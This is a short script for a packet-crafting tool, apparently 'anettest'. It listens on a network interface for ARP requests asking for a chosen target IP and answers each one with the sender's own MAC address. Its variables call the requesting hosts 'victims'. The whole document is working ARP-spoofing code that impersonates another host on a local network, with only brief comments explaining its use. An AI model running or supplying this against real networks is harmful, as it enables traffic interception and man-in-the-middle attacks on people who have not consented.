/*
   Continuously waits for any arp requests and sends replies to them.

   run program as
     anettest -d eth0 -f this_file.fws
*/

INCLUDE arp

DEFINE neededIP 10.178.205.1       // input here the IP address of target host
DEFINE myMac 00:19:5b:e9:ef:5b

// variables (automatically initialized on an expected packet reception)

var victimIP arp.srcip 0.0.0.0 autoset
var victimMacAdr srcmac 00:16:17:17:4f:d8 autoset

// description of the arp request to wait

INCLUDE arp

name "arp_request"
arp.opcode = areq
dstmac = 0xffffffffffff
arp.dstip = neededIP

	ADD

// infinite cycle

cyc inf {

   waitall    // waits requests

   ifr arp_request {		// if a packer 'arp_request' has been received

      // description of the arp reply

      INCLUDE arp

      srcmac = mymac
      dstmac = victimMacAdr

      arp.opcode = arep
      arp.srcmac = mymac
      arp.dstmac = victimMacAdr
      arp.srcip = neededIP
      arp.dstip = victimIP

      print 'send reply to $victimIP$, $victimMacAdr$\n'

      SEND  // sends above packet
   }

   unfix
}

